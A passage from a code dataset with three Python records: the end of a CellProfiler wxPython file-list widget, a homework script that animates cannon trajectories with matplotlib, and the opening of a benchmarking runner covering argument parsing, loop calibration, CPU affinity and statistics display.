paint_dc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))\n paint_dc.SetFont(font)\n text_width, text_height = paint_dc.GetTextExtent(text)\n paint_dc.DrawText(text,\n (width - text_width) / 2,\n (height - text_height) / 2)\n paint_dc.SetFont(self.Font)\n\n selected_text = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT)\n try:\n x = self.GetScrollPos(wx.SB_HORIZONTAL)\n y = self.GetScrollPos(wx.SB_VERTICAL)\n line_height = self.line_height + self.leading\n yline = min(y, len(self))\n yline_max = min(yline + (height + line_height - 1) / line_height,\n len(self))\n sel_width = 0\n #\n # Precompute the width of the selection rectangle\n #\n for idx in range(yline + 1, yline_max):\n item, pidx = self[idx]\n if item is None:\n break\n if pidx is None:\n continue\n if self.show_idx_as_selected(idx) or self.focus_item == idx:\n item_width = paint_dc.GetTextExtent(\n item.file_display_names[pidx])[0]\n sel_width = max(sel_width, item_width)\n\n #\n # Paint the strings\n #\n for idx in range(yline, yline_max):\n yy = (idx - yline) * line_height\n item, pidx = self[idx]\n if item is None:\n break\n if pidx is None or idx == yline:\n # A directory\n paint_dc.SetTextForeground(dir_color)\n rTreeItem = wx.Rect(\n -x, yy, self.TREEITEM_WIDTH, self.TREEITEM_HEIGHT)\n rn.DrawTreeItemButton(\n self, paint_dc, rTreeItem,\n wx.CONTROL_EXPANDED if item.opened else 0)\n paint_dc.DrawText(\n item.folder_display_name,\n self.TREEITEM_WIDTH + self.TREEITEM_GAP - x, yy)\n else:\n # A file\n selected = self.show_idx_as_selected(idx)\n flags = wx.CONTROL_FOCUSED if has_focus else 0\n if selected:\n flags += wx.CONTROL_SELECTED\n if idx == self.focus_item:\n flags += wx.CONTROL_CURRENT\n cellprofiler.gui.draw_item_selection_rect(\n self, paint_dc,\n wx.Rect(self.TREEITEM_WIDTH - x, yy,\n sel_width + 2 * self.TREEITEM_GAP, line_height),\n flags)\n if selected:\n paint_dc.SetTextForeground(selected_text)\n else:\n paint_dc.SetTextForeground(\n enabled_color if item.enabled[pidx]\n else disabled_color)\n paint_dc.DrawText(\n item.file_display_names[pidx],\n self.TREEITEM_WIDTH + self.TREEITEM_GAP - x, yy)\n finally:\n paint_dc.SetBrush(wx.NullBrush)\n paint_dc.SetFont(wx.NullFont)\n background_brush.Destroy()\n paint_dc.EndDrawing()\n paint_dc.Destroy()\n\n def refresh_item(self, idx):\n \"\"\"Signal the window to repaint the given item\n\n idx - index of the item.\n \"\"\"\n total_height = (self.line_height + self.leading)\n y = (idx - self.GetScrollPos(wx.SB_VERTICAL)) * total_height\n width, _ = self.GetSizeTuple()\n self.Refresh(eraseBackground=False,\n rect=wx.Rect(0, y, width, total_height))\n\n def get_mouse_idx(self, event):\n \"\"\"Return the line index at the event's mouse coordinate\"\"\"\n if len(self.folder_items) == 0:\n return -1\n x, y = event.GetPositionTuple()\n line_height = self.line_height + self.leading\n idx = int(y / line_height) + self.GetScrollPos(wx.SB_VERTICAL)\n idx = max(0, min(len(self) - 1, idx))\n if y < line_height:\n # It's the slightly bogus directory at the top\n self.recalc()\n folder_idx = bisect.bisect_right(self.folder_idxs, idx) - 1\n if folder_idx == -1:\n return -1\n idx = self.folder_idxs[folder_idx]\n return idx\n\n @staticmethod\n def get_treeitem_x():\n \"\"\"Return the width of the treeitem graphic\n\n returns wx.SYS_SMALLICON_X if defined on the platform\n or 16 for the Mac.\n \"\"\"\n treeitem_x = wx.SystemSettings.GetMetric(wx.SYS_SMALLICON_X)\n if treeitem_x < 0:\n # wx.SYS_SMALLICON_X not defined for this platform\n # (which means Mac)\n return 16\n return treeitem_x\n\n def on_mouse_down(self, event):\n \"\"\"Handle left mouse button down\"\"\"\n assert isinstance(event, wx.MouseEvent)\n self.SetFocus()\n idx = self.get_mouse_idx(event)\n if len(self.folder_items) == 0:\n return\n item, path_idx = self[idx]\n if item is None:\n item = self.folder_items[-1]\n path_idx = len(item.filenames)\n\n treeitem_x = self.get_treeitem_x()\n\n if path_idx is None and event.GetX() < treeitem_x:\n needs_selchange_evt = len(self.selections) > 0\n self.selections = set()\n item.opened = not item.opened\n self.schmutzy = True\n if needs_selchange_evt:\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n return\n\n if event.ShiftDown() and len(self.selections) == 1:\n self.mouse_down_idx = self.selections.pop()\n else:\n self.mouse_down_idx = idx\n if not event.ControlDown():\n self.selections = set()\n self.mouse_idx = idx\n self.focus_item = idx\n self.CaptureMouse()\n self.Refresh(eraseBackground=False)\n\n def on_double_click(self, event):\n \"\"\"Handle double click event\"\"\"\n idx = self.get_mouse_idx(event)\n if idx == -1:\n self.fn_do_menu_command([], None)\n return\n item, path_idx = self[idx]\n if item is None:\n self.fn_do_menu_command([], None)\n return\n treeitem_x = self.get_treeitem_x()\n if path_idx is None:\n if event.GetX() < treeitem_x:\n # Handle second click on tree expand/contract as\n # if the user clicked slowly\n #\n self.selections = set()\n item.opened = not item.opened\n self.schmutzy = True\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n return\n if self.fn_do_menu_command is not None:\n self.fn_do_menu_command([item.get_full_path(path_idx)], None)\n\n def on_right_mouse_down(self, event):\n \"\"\"Handle right mouse button down\"\"\"\n assert isinstance(event, wx.MouseEvent)\n self.SetFocus()\n idx = self.get_mouse_idx(event)\n if idx == -1 or len(self.folder_items) == 0:\n event.Skip(True)\n return\n\n self.focus_item = idx\n if self[idx][1] is not None:\n self.selections.add(idx)\n self.notify_selection_changed()\n self.refresh_item(idx)\n event.Skip(True)\n\n def on_mouse_moved(self, event):\n \"\"\"Handle mouse movement during capture\"\"\"\n if self.mouse_down_idx is None:\n return\n self.mouse_idx = self.get_mouse_idx(event)\n self.focus_item = self.mouse_idx\n self.scroll_into_view()\n self.Refresh(eraseBackground=False)\n\n def scroll_into_view(self):\n \"\"\"Scroll the focus item into view\"\"\"\n idx_min = self.GetScrollPos(wx.SB_VERTICAL)\n current_x = self.GetScrollPos(wx.SB_HORIZONTAL)\n _, height = self.GetSizeTuple()\n height = int(height / (self.line_height + self.leading))\n idx_max = idx_min + height\n if self.focus_item <= idx_min:\n self.Scroll(current_x, self.focus_item - 1)\n self.refresh_item(self.focus_item)\n self.refresh_item(self.focus_item - 1)\n elif self.focus_item >= idx_max:\n self.Scroll(current_x, self.focus_item - height + 1)\n\n def on_mouse_up(self, event):\n \"\"\"Handle left mouse button up event\"\"\"\n if self.mouse_down_idx is None:\n return\n if self.mouse_down_idx == self.mouse_idx:\n if self.mouse_down_idx in self.selections:\n self.selections.remove(self.mouse_down_idx)\n self.Refresh(eraseBackground=False)\n elif self[self.mouse_down_idx][1] is not None:\n self.selections.add(self.mouse_down_idx)\n else:\n start = min(self.mouse_down_idx, self.mouse_idx)\n end = max(self.mouse_down_idx, self.mouse_idx) + 1\n self.selections.update(\n [idx for idx in range(start, end) if self[idx][1] is not None])\n self.mouse_down_idx = None\n self.notify_selection_changed()\n self.ReleaseMouse()\n\n def on_mouse_capture_lost(self, event):\n \"\"\"Handle loss of mouse capture\"\"\"\n self.mouse_down_idx = None\n\n def on_up_down(self, event, direction):\n \"\"\"Handle the up and down arrow keys\n\n Move the current selection up or down.\n\n event - key event\n direction - 1 for down, -1 for up\n \"\"\"\n needs_selchange_event = False\n if (self.focus_item in self.selections and\n not event.ShiftDown()):\n if len(self.selections) > 1:\n self.Refresh(eraseBackground=False)\n self.selections = set()\n needs_selchange_event = True\n self.refresh_item(self.focus_item)\n if (direction + self.focus_item < 0 or\n direction + self.focus_item >= len(self)):\n if needs_selchange_event:\n self.notify_selection_changed()\n return\n self.focus_item += direction\n # There should never be an empty directory, therefore, item # 1\n # should be the only item that has no precedent and we\n # should only have to skip one directory item\n if self[self.focus_item][1] is None:\n self.focus_item += direction\n self.scroll_into_view()\n self.selections.add(self.focus_item)\n self.notify_selection_changed()\n self.refresh_item(self.focus_item)\n\n def on_key_down(self, event):\n \"\"\"Handle a key press\"\"\"\n assert isinstance(event, wx.KeyEvent)\n if event.KeyCode == wx.WXK_DELETE and self.fn_delete is not None:\n paths = self.get_paths(self.FLAG_SELECTED_ONLY)\n self.fn_delete(paths)\n return\n elif (event.KeyCode == wx.WXK_UP and self.focus_item is not None\n and self.focus_item > 1):\n self.on_up_down(event, -1)\n return\n elif (event.KeyCode == wx.WXK_DOWN and self.focus_item is not None\n and self.focus_item < len(self)):\n self.on_up_down(event, 1)\n return\n event.Skip(True)\n\n context_menu_ids = []\n\n def on_context_menu(self, event):\n \"\"\"Handle a context menu request\"\"\"\n if self.focus_item is None:\n fn_context_menu = self.fn_empty_context_menu\n fn_do_menu_command = self.fn_do_empty_context_menu_command\n arg = None\n else:\n item, idx = self[self.focus_item]\n if idx is None:\n fn_context_menu = self.fn_folder_context_menu\n fn_do_menu_command = self.fn_do_folder_menu_command\n arg = item.folder_name\n else:\n fn_context_menu = self.fn_context_menu\n fn_do_menu_command = self.fn_do_menu_command\n arg = self.get_paths(self.FLAG_SELECTED_ONLY)\n\n if fn_context_menu is None or fn_do_menu_command is None:\n return\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n item_list = fn_context_menu(arg)\n if len(self.context_menu_ids) < len(item_list):\n self.context_menu_ids += [\n wx.NewId() for _ in range(len(self.context_menu_ids),\n len(item_list))]\n menu = wx.Menu()\n for idx, (key, display_name) in enumerate(item_list):\n menu.Append(self.context_menu_ids[idx], display_name)\n\n def on_menu(event):\n idx = self.context_menu_ids.index(event.Id)\n fn_do_menu_command(arg, item_list[idx][0])\n\n self.Bind(wx.EVT_MENU, on_menu)\n try:\n self.PopupMenu(menu, pos)\n finally:\n self.Unbind(wx.EVT_MENU, handler=on_menu)\n menu.Destroy()\n","sub_path":"cellprofiler/gui/pathlist.py","file_name":"pathlist.py","file_ext":"py","file_size_in_byte":35662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485056520","text":"from matplotlib import pyplot as plt \nfrom matplotlib import animation \nimport math \n\n#calculate the trajectory\ndef Trajectory(v,theta,B,T0,choice):\n v_x=v * math.cos(theta * math.pi/180)\n v_y=v * math.sin(theta * math.pi/180)\n dt,y0,a,alpha=0.005,10**4,6.5*10**(-3),2.5\n x,y,t=0,0,0\n distance=[[]for i in range(3)]\n distance[0].append(x)\n distance[1].append(y)\n if choice<0: #negative for isothermal approximation\n def rho(height):\n return math.exp(-height/y0)\n else: #non-negative for adiabatic approximation\n def rho(height):\n return (1-a*height/T0)**alpha\n while y>= 0:\n a_x3, a_y3=-B*rho(y)*v*v_x,-9.8-B*rho(y)*v*v_y\n x=x+v_x*dt\n v_x=v_x+a_x3*dt\n y=y+v_y*dt\n v_y=v_y+a_y3*dt\n t=t+dt\n v=(v_x**2+v_y**2)**0.5\n distance[0].append(x/1000) #divided by 1000 to change the unit from \"meter\" to \"kilometer\"\n distance[1].append(y/1000)\n distance[2].append(t)\n return distance\nXMAX=0\nANGLE=0\n# first set up the figure, the axis, and the plot element we want to animate \nfig = plt.figure() \nax = plt.axes(xlim=(0, 35), ylim=(0,18))\nline, = ax.plot([], [], lw=2) \nplt.title('Cannon Trajectory of Isothermal Approximation')\nplt.xlabel('Horizon Distance x(km)')\nplt.ylabel('Vertical Distance y(km)')\nplt.grid(True,color='k')\nnote = ax.text(18,12,'',fontsize=12)\nnote1= ax.text(18,8,'',fontsize=12,color='red')\n# initialization function: plot the background of each frame\ndef init(): \n line.set_data([], []) \n note.set_text('') \n note1.set_text('') \n return line,note,note1\n# animation function. this is called sequentially \ndef animate(j):\n dis=Trajectory(700,j,4*10**(-5),300,-1) \n x = dis[0] \n y = dis[1]\n global XMAX\n global J\n if XMAX < x[-1]:\n XMAX,J=x[-1],j\n line.set_data(x, y) \n note.set_text('initial speed:700m/s \\n'+'firing angle: %d'%j + r'$^{\\circ}$'+ '\\ndistance:%s'%dis[0][-1] + 'km')\n note1.set_text('angle of furthest distance:%d'%J+r'$^{\\circ}$'+'\\nmaximum range:%s'%XMAX + 'km')\n return line,note,note1\n\nanim1=animation.FuncAnimation(fig, animate, init_func=init, frames=90, interval=5)#, blit=True) \nanim1.save('/home/shangguan/computationalphysics_N2013301020076/ex6_ch2.9/try/111.png')#anim1.save('11111.mp4', fps=30, extra_args=['-vcodec', 'libx264'])\nplt.show() \n","sub_path":"Homework5/Homework5-4.py","file_name":"Homework5-4.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299833936","text":"from __future__ import print_function\nimport argparse\nimport errno\nimport os\nimport subprocess\nimport sys\n\nimport six\nimport statistics # Python 3.4+, or backport on Python 2.7\n\ntry:\n # Optional dependency\n import psutil\nexcept ImportError:\n psutil = None\n\nimport perf.metadata\n\n\ndef _bench_suite_from_subprocess(args):\n proc = subprocess.Popen(args,\n universal_newlines=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n try:\n if six.PY3:\n with proc:\n stdout, stderr = proc.communicate()\n else:\n stdout, stderr = proc.communicate()\n except:\n try:\n proc.kill()\n except OSError:\n pass\n proc.wait()\n raise\n\n if proc.returncode:\n sys.stdout.write(stdout)\n sys.stdout.flush()\n sys.stderr.write(stderr)\n sys.stderr.flush()\n raise RuntimeError(\"%s failed with exit code %s\"\n % (args[0], proc.returncode))\n\n return perf.BenchmarkSuite.loads(stdout)\n\n\ndef _display_run(bench, run_index, run,\n common_metadata=None, raw=False, verbose=0, file=None):\n loops = run.loops * run.inner_loops\n raw_samples = run._get_raw_samples(warmups=True)\n if not raw:\n samples = [sample / loops for sample in raw_samples]\n else:\n samples = raw_samples\n\n samples_str = list(bench._format_samples(samples))\n\n median = bench.median()\n max_delta = median * 0.05\n for index, sample in enumerate(samples):\n if raw:\n sample /= loops\n delta = sample - median\n if abs(delta) > max_delta:\n samples_str[index] += ' (%+.0f%%)' % (delta * 100 / median)\n\n # FIXME: don't use private attribute\n nwarmup = run._warmups\n if nwarmup:\n warmups = samples_str[:nwarmup]\n samples = samples_str[nwarmup:]\n else:\n samples = samples_str\n\n if raw:\n name = 'raw samples'\n else:\n name = 'samples'\n text = '%s (%s): %s' % (name, len(samples), ', '.join(samples))\n if nwarmup and verbose >= 0:\n if raw:\n name = 'raw warmup'\n else:\n name = 'warmup'\n text = ('%s (%s): %s; %s'\n % (name, len(warmups), ', '.join(warmups), text))\n\n text = \"Run %s: %s\" % (run_index, text)\n print(text, file=file)\n\n if verbose > 0:\n prefix = ' '\n print(prefix + 'loops: %s' % perf._format_number(run.loops))\n if run.inner_loops:\n print(prefix + 'inner_loops: %s'\n % perf._format_number(run.inner_loops))\n\n metadata = run.get_metadata()\n for key in sorted(metadata):\n if common_metadata and key in common_metadata:\n continue\n value = metadata[key]\n print('%s%s: %s' % (prefix, key, value))\n\n\ndef _display_runs(bench, quiet=False, verbose=False, raw=False, file=None):\n runs = bench.get_runs()\n if quiet:\n verbose = -1\n elif verbose:\n verbose = 1\n else:\n verbose = 0\n\n if verbose > 0:\n common_metadata = bench._get_common_metadata()\n print(\"Common metadata:\", file=file)\n for key in sorted(common_metadata):\n value = common_metadata[key]\n print(' %s: %s' % (key, value), file=file)\n print(file=file)\n else:\n common_metadata = None\n\n for run_index, run in enumerate(runs, 1):\n _display_run(bench, run_index, run,\n common_metadata=common_metadata,\n verbose=verbose, raw=raw, file=file)\n\n\ndef _display_stats(bench, file=None):\n fmt = bench._format_sample\n samples = bench.get_samples()\n\n nrun = bench.get_nrun()\n nsample = len(samples)\n median = bench.median()\n\n # Raw sample minimize/maximum\n raw_samples = bench._get_raw_samples()\n print(\"Raw sample minimum: %s\" % bench._format_sample(min(raw_samples)),\n file=file)\n print(\"Raw sample maximum: %s\" % bench._format_sample(max(raw_samples)),\n file=file)\n print(file=file)\n\n # Number of samples\n print(\"Number of runs: %s\" % perf._format_number(nrun), file=file)\n print(\"Total number of samples: %s\" % perf._format_number(nsample),\n file=file)\n\n nsample_per_run = bench._get_nsample_per_run()\n text = perf._format_number(nsample_per_run)\n if isinstance(nsample_per_run, float):\n text += ' (average)'\n print('Number of samples per run: %s' % text, file=file)\n\n warmups = bench.get_warmups()\n text = perf._format_number(warmups)\n if isinstance(warmups, float):\n text += ' (average)'\n print('Number of warmups per run: %s' % text, file=file)\n\n # Loop iterations per sample\n loops = bench.get_loops()\n inner_loops = bench.get_inner_loops()\n total_loops = loops * inner_loops\n if isinstance(total_loops, int):\n text = perf._format_number(total_loops)\n else:\n text = \"%s (average)\" % total_loops\n\n if not(isinstance(inner_loops, int) and inner_loops == 1):\n if isinstance(loops, int):\n loops = perf._format_number(loops, 'outter-loop')\n else:\n loops = '%.1f outter-loops (average)'\n\n if isinstance(inner_loops, int):\n inner_loops = perf._format_number(inner_loops, 'inner-loop')\n else:\n inner_loops = \"%.1f inner-loops (average)\" % inner_loops\n\n text = '%s (%s x %s)' % (text, loops, inner_loops)\n\n print(\"Loop iterations per sample: %s\" % text, file=file)\n print(file=file)\n\n # Minimum\n def format_limit(median, value):\n return \"%s (%+.0f%%)\" % (fmt(value), (value - median) * 100 / median)\n\n print(\"Minimum: %s\" % format_limit(median, min(samples)), file=file)\n\n # Median +- std dev\n print(str(bench), file=file)\n\n # Mean +- std dev\n mean = statistics.mean(samples)\n if len(samples) > 2:\n stdev = statistics.stdev(samples, mean)\n print(\"Mean +- std dev: %s +- %s\"\n % bench._format_samples((mean, stdev)),\n file=file)\n else:\n print(\"Mean: %s\" % bench._format_sample(mean), file=file)\n\n # Maximum\n print(\"Maximum: %s\" % format_limit(median, max(samples)), file=file)\n\n\ndef _display_histogram(benchmarks, bins=20, extend=False, file=None):\n import collections\n import shutil\n\n if hasattr(shutil, 'get_terminal_size'):\n columns, lines = shutil.get_terminal_size()\n else:\n columns = 80\n lines = 25\n\n if not bins:\n bins = max(lines - 3, 3)\n if not extend:\n bins = min(bins, 25)\n\n all_samples = []\n for bench, title in benchmarks:\n all_samples.extend(bench.get_samples())\n all_min = min(all_samples)\n all_max = max(all_samples)\n sample_k = float(all_max - all_min) / bins\n if not sample_k:\n sample_k = 1.0\n\n def sample_bucket(value):\n # round towards zero (ROUND_DOWN)\n return int(value / sample_k)\n bucket_min = sample_bucket(all_min)\n bucket_max = sample_bucket(all_max)\n\n for index, item in enumerate(benchmarks):\n bench, title = item\n if title:\n print(\"[ %s ]\" % title, file=file)\n\n samples = bench.get_samples()\n\n buckets = [sample_bucket(value) for value in samples]\n counter = collections.Counter(buckets)\n count_max = max(counter.values())\n count_width = len(str(count_max))\n\n sample_width = max([len(bench._format_sample(bucket * sample_k))\n for bucket in range(bucket_min, bucket_max + 1)])\n width = columns - sample_width\n\n line = ': %s #' % count_max\n width = columns - (sample_width + len(line))\n if not extend:\n width = min(width, 79)\n width = max(width, 3)\n line_k = float(width) / max(counter.values())\n for bucket in range(bucket_min, bucket_max + 1):\n count = counter.get(bucket, 0)\n linelen = int(round(count * line_k))\n text = bench._format_sample(bucket * sample_k)\n line = ('#' * linelen) or '|'\n print(\"{:>{}}: {:>{}} {}\".format(text, sample_width,\n count, count_width, line),\n file=file)\n\n if index != len(benchmarks) - 1:\n print(file=file)\n\n\ndef _warn_if_bench_unstable(bench):\n # FIXME: modify Benchmark constructor to avoid this annoying case?\n if not bench.get_nrun():\n raise ValueError(\"benchmark has no run\")\n\n warnings = []\n warn = warnings.append\n samples = bench.get_samples()\n\n # Display a warning if the standard deviation is larger than 10%\n median = bench.median()\n # Avoid division by zero\n if median and len(samples) > 1:\n k = statistics.stdev(samples) / median\n if k > 0.10:\n if k > 0.20:\n warn(\"ERROR: the benchmark is very unstable, the standard \"\n \"deviation is very high (stdev/median: %.0f%%)!\"\n % (k * 100))\n else:\n warn(\"WARNING: the benchmark seems unstable, the standard \"\n \"deviation is high (stdev/median: %.0f%%)\"\n % (k * 100))\n warn(\"Try to rerun the benchmark with more runs, samples \"\n \"and/or loops\")\n warn(\"\")\n\n # Check that the shortest sample took at least 1 ms\n shortest = min(bench._get_raw_samples())\n text = bench._format_sample(shortest)\n if shortest < 1e-3:\n if shortest < 1e-6:\n warn(\"ERROR: the benchmark may be very unstable, \"\n \"the shortest raw sample only took %s\" % text)\n else:\n warn(\"WARNING: the benchmark may be unstable, \"\n \"the shortest raw sample only took %s\" % text)\n warn(\"Try to rerun the benchmark with more loops \"\n \"or increase --min-time\")\n warn(\"\")\n\n return warnings\n\n\ndef _display_metadata(metadata, header=\"Metadata:\", file=None):\n if not metadata:\n return\n print(header, file=file)\n for key, value in sorted(metadata.items()):\n print(\"- %s: %s\" % (key, value), file=file)\n\n\ndef _display_benchmark(bench, file=None, check_unstable=True, metadata=False,\n dump=False, stats=False, hist=False):\n if dump:\n _display_runs(bench, file=file)\n print(file=file)\n\n if metadata:\n _display_metadata(bench.get_metadata(), file=file)\n print(file=file)\n\n if hist:\n _display_histogram([(bench, None)], file=file)\n print(file=file)\n\n if stats:\n _display_stats(bench, file=file)\n print(file=file)\n\n if check_unstable:\n warnings = _warn_if_bench_unstable(bench)\n for line in warnings:\n print(line, file=file)\n\n print(str(bench), file=file)\n\n\nclass TextRunner:\n # Default parameters are chosen to have approximatively a run of 0.5 second\n # and so a total duration of 5 seconds by default\n def __init__(self, name, samples=3, warmups=1, processes=20,\n loops=0, min_time=0.1, max_time=1.0, metadata=None,\n inner_loops=1, _argparser=None):\n if not name:\n raise ValueError(\"name must be a non-empty string\")\n self.name = name\n if metadata is not None:\n self.metadata = metadata\n else:\n self.metadata = {}\n\n # result of argparser.parse_args()\n self.args = None\n\n # callback used to prepare command line arguments to spawn a worker\n # child process. The callback is called with prepare(runner, args).\n # args must be modified in-place.\n self.prepare_subprocess_args = None\n\n # Command list arguments to call the program:\n # (sys.executable, sys.argv[0]) by default. For example,\n # \"python3 -m perf.timeit\" sets program_args to\n # (sys.executable, '-m', 'perf.timeit').\n self.program_args = (sys.executable, sys.argv[0])\n\n # Number of inner-loops of the sample_func for bench_sample_func()\n self.inner_loops = inner_loops\n\n def strictly_positive(value):\n value = int(value)\n if value <= 0:\n raise ValueError(\"value must be > 0\")\n return value\n\n def positive_or_nul(value):\n value = int(value)\n if value < 0:\n raise ValueError(\"value must be >= 0\")\n return value\n\n if _argparser is not None:\n parser = _argparser\n else:\n parser = argparse.ArgumentParser()\n parser.description = 'Benchmark'\n parser.add_argument('--rigorous', action=\"store_true\",\n help='Spend longer running tests '\n 'to get more accurate results')\n parser.add_argument('--fast', action=\"store_true\",\n help='Get rough answers quickly')\n parser.add_argument(\"--debug-single-sample\", action=\"store_true\",\n help=\"Debug mode, only collect a single sample\")\n parser.add_argument('-p', '--processes',\n type=strictly_positive, default=processes,\n help='number of processes used to run benchmarks '\n '(default: %s)' % processes)\n parser.add_argument('-n', '--samples', dest=\"samples\",\n type=strictly_positive, default=samples,\n help='number of samples per process (default: %s)'\n % samples)\n parser.add_argument('-w', '--warmups', dest=\"warmups\",\n type=positive_or_nul, default=warmups,\n help='number of skipped samples per run used '\n 'to warmup the benchmark (default: %s)'\n % warmups)\n parser.add_argument('-l', '--loops',\n type=positive_or_nul, default=loops,\n help='number of loops per sample, 0 means '\n 'automatic calibration (default: %s)'\n % loops)\n parser.add_argument('-v', '--verbose', action=\"store_true\",\n help='enable verbose mode')\n parser.add_argument('-q', '--quiet', action=\"store_true\",\n help='enable quiet mode')\n parser.add_argument('--stdout', action='store_true',\n help='write results encoded to JSON into stdout')\n parser.add_argument('--json', metavar='FILENAME',\n help='write results encoded to JSON into FILENAME')\n parser.add_argument('--json-append', metavar='FILENAME',\n help='append results encoded to JSON into FILENAME')\n parser.add_argument('--min-time', type=float, default=min_time,\n help='Minimum duration in seconds of a single '\n 'sample, used to calibrate the number of '\n 'loops (default: %s)'\n % perf._format_timedelta(min_time))\n parser.add_argument('--worker', action=\"store_true\",\n help='worker process, run the benchmark')\n parser.add_argument('-d', '--dump', action=\"store_true\",\n help='display benchmark run results')\n parser.add_argument('--metadata', '-m', action=\"store_true\",\n help='show metadata')\n parser.add_argument('--hist', '-g', action=\"store_true\",\n help='display an histogram of samples')\n parser.add_argument('--stats', '-t', action=\"store_true\",\n help='display statistics (min, max, ...)')\n parser.add_argument(\"--affinity\", metavar=\"CPU_LIST\", default=None,\n help='Specify CPU affinity for worker processes. '\n 'This way, benchmarks can be forced to run '\n 'on a given set of CPUs to minimize run to '\n 'run variation. By default, worker processes '\n 'are pinned to isolate CPUs if isolated CPUs '\n 'are found.')\n self.argparser = parser\n\n def _calibrate_sample_func(self, sample_func):\n stream = self._stream()\n\n min_dt = self.args.min_time * 0.90\n max_loops = 2 ** 32\n\n loops = 1\n while 1:\n if loops > max_loops:\n raise ValueError(\"unable to calibrate: loops=%s\" % loops)\n\n dt = sample_func(loops)\n if self.args.verbose:\n print(\"calibration: %s: %s\"\n % (perf._format_number(loops, 'loop'),\n perf._format_timedelta(dt)),\n file=stream)\n\n if dt >= min_dt:\n break\n\n loops *= 2\n\n if self.args.verbose:\n print(\"calibration: use %s\" % perf._format_number(loops, 'loop'),\n file=stream)\n\n return loops\n\n def _process_args(self):\n if self.args.quiet:\n self.args.verbose = False\n if self.args.debug_single_sample:\n self.args.worker = True\n\n nprocess = self.argparser.get_default('processes')\n nsamples = self.argparser.get_default('samples')\n if self.args.rigorous:\n self.args.processes = nprocess * 2\n # self.args.samples = nsamples * 5 // 3\n elif self.args.fast:\n # use at least 3 processes to benchmark 3 different (randomized)\n # hash functions\n self.args.processes = max(nprocess // 2, 3)\n self.args.samples = max(nsamples * 2 // 3, 2)\n elif self.args.debug_single_sample:\n self.args.processes = 1\n self.args.warmups = 0\n self.args.samples = 1\n self.args.loops = 1\n self.args.min_time = 1e-9\n\n filename = self.args.json\n if filename and os.path.exists(filename):\n print(\"ERROR: The JSON file %r already exists\" % filename)\n sys.exit(1)\n\n def parse_args(self, args=None):\n if self.args is None:\n self.args = self.argparser.parse_args(args)\n self._process_args()\n return self.args\n\n def _stream(self):\n return sys.stderr if self.args.stdout else sys.stdout\n\n def _range(self):\n for warmup in six.moves.xrange(self.args.warmups):\n yield (True, 1 + warmup)\n for run in six.moves.xrange(self.args.samples):\n yield (False, 1 + run)\n\n def _cpu_affinity(self):\n # sched_setaffinity() was added to Python 3.3\n has_sched_setaffinity = hasattr(os, 'sched_setaffinity')\n if not has_sched_setaffinity:\n if psutil is not None:\n proc = psutil.Process()\n psutil_has_cpu_affinity = hasattr(proc, 'cpu_affinity')\n else:\n psutil_has_cpu_affinity = False\n\n cpus = self.args.affinity\n if not cpus:\n stream = self._stream()\n\n # --affinity option is not set: detect isolated CPUs\n cpus = perf._get_isolated_cpus()\n if not cpus:\n # no isolated CPUs or unable to get the isolated CPUs\n return\n\n if not has_sched_setaffinity and not psutil_has_cpu_affinity:\n # unable to pin CPUs\n print(\"WARNING: unable to pin worker processes to \"\n \"isolated CPUs, CPU affinity not available\", file=stream)\n print(\"Use Python 3.3 or newer, or install psutil dependency\",\n file=stream)\n return\n\n if self.args.verbose:\n print(\"Pin process to isolated CPUs: %s\"\n % perf._format_cpu_list(cpus), file=stream)\n\n self.args.affinity = perf._format_cpu_list(cpus)\n else:\n cpus = perf._parse_cpu_list(cpus)\n if self.args.verbose:\n print(\"Pin process to CPUs: %s\"\n % perf._format_cpu_list(cpus),\n file=self._stream())\n\n if has_sched_setaffinity:\n os.sched_setaffinity(0, cpus)\n elif psutil_has_cpu_affinity:\n proc = psutil.Process()\n proc.cpu_affinity(cpus)\n else:\n print(\"ERROR: CPU affinity not available.\", file=sys.stderr)\n print(\"Use Python 3.3 or newer, or install psutil dependency\",\n file=stream)\n sys.exit(1)\n\n def _worker(self, bench, sample_func):\n stream = self._stream()\n loops = self.args.loops\n\n raw_samples = []\n for is_warmup, index in self._range():\n raw_sample = sample_func(loops)\n\n # The most accurate time has a resolution of 1 nanosecond. We\n # compute a difference between two timer values. When formatted to\n # decimal, the difference can show more than 9 decimal digits after\n # the dot. Round manually to 10^-9 to produce more compact JSON\n # files and don't pretend to have a better resolution than 1\n # nanosecond.\n raw_sample = round(raw_sample, 9)\n\n raw_samples.append(raw_sample)\n\n if self.args.verbose:\n text = bench._format_sample(raw_sample)\n if is_warmup:\n text = \"Warmup %s: %s\" % (index, text)\n else:\n text = \"Raw sample %s: %s\" % (index, text)\n print(text, file=stream)\n\n if self.args.verbose:\n print(file=stream)\n\n run = perf.Run(self.args.warmups, raw_samples,\n loops=loops,\n inner_loops=self.inner_loops)\n bench.add_run(run)\n self._display_result(bench, check_unstable=False)\n\n return bench\n\n def _main(self, sample_func):\n start_time = perf.monotonic_clock()\n\n self.parse_args()\n\n self._cpu_affinity()\n\n if self.args.loops == 0:\n self.args.loops = self._calibrate_sample_func(sample_func)\n\n bench = perf.Benchmark(name=self.name, metadata=self.metadata)\n\n try:\n if self.args.worker or self.args.debug_single_sample:\n return self._worker(bench, sample_func)\n else:\n return self._spawn_workers(bench, start_time)\n except KeyboardInterrupt:\n print(\"Interrupted: exit\", file=sys.stderr)\n sys.exit(1)\n\n def bench_sample_func(self, sample_func, *args):\n \"\"\"\"Benchmark sample_func(loops, *args)\n\n The function must return the total elapsed time, not the average time\n per loop iteration. The total elapsed time is required to be able\n to automatically calibrate the number of loops.\n\n perf.perf_counter() should be used to measure the elapsed time.\n \"\"\"\n\n if not args:\n return self._main(sample_func)\n\n def wrap_sample_func(loops):\n return sample_func(loops, *args)\n\n return self._main(wrap_sample_func)\n\n def bench_func(self, func, *args):\n \"\"\"\"Benchmark func(*args).\"\"\"\n\n def sample_func(loops):\n # use fast local variables\n local_timer = perf.perf_counter\n local_func = func\n local_args = args\n\n if local_args:\n if loops != 1:\n range_it = 